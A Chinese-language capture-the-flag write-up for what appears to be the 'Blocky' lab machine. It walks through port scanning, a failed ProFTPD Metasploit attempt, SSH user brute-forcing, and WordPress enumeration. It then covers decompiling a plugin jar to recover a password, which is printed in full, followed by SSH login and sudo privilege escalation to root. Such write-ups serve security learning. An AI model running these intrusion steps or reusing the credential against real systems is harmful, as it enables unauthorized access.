10.10.10.37
| 21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
|
21
| ftp 10.10.10.37
searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | exploits/linux/remote/36803.py
msfconsole
use exploit/unix/ftp/proftpd_modcopy_exec
执行失败
|
22
| python ssh.py --userList /usr/share/wordlists/linux-user.txt --outputFile out.txt 10.10.10.37
ssh root@10.10.10.37
ssh_exchange_identification: Connection closed by remote host
|
ssh禁止过多的连接
80
| Server: Apache/2.4.18 (Ubuntu)
WordPress version 4.8
http://10.10.10.37:80
wpscan --url 10.10.10.37 --enumerate p
wpscan --url 10.10.10.37 --enumerate p --enumerate u
searchsploit wordpress Host Header Injection
WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
|
手动检查了一个wpscan提示的可能漏洞,检查并没有,于是用burp scanner扫描一遍再说。
useful info
| phpadmin vesion4.5.4(burp scanner扫描结果)
WordPress/4.8
http://10.10.10.37/phpmyadmin/index.php
http://10.10.10.37/wp-login.php
http://10.10.10.37/wp-links-opml.php
http://10.10.10.37/plugins/
|
25565
searchsploit Minecraft
经过搜索,好像是一个游戏,“《我的世界》是一款沙盒游戏。。。”
| nc -nv 10.10.10.37 25565
wget http://10.10.10.37:25565
|
writeup
| wpscan
[+] Notch
| Detected By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
|
获得一个用户名
在plugin目录下下载jar文件,unzip解压,jad反编译,获得一个口令
以/root/8YsqfCTnvxAUeduzjNSXe22,登录phpmyadmin成功。
| ssh root@10.10.10.37
ssh Notch@10.10.10.37
ssh notch@10.10.10.37,成功
|
提权:
| whoami 以notch普通用户登陆
sudo -l
响应,说明该用户可以运行任何命令
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
groups notch 查看该用户所在的组,有sudo组
notch : notch adm cdrom sudo dip plugdev lxd lpadmin sambashare
sudo su
|
以前用过该方式提权。
总结
第一次尝试了java反汇编
wpscan可以使用不带参数的–enumerate,来枚举所有可能漏洞。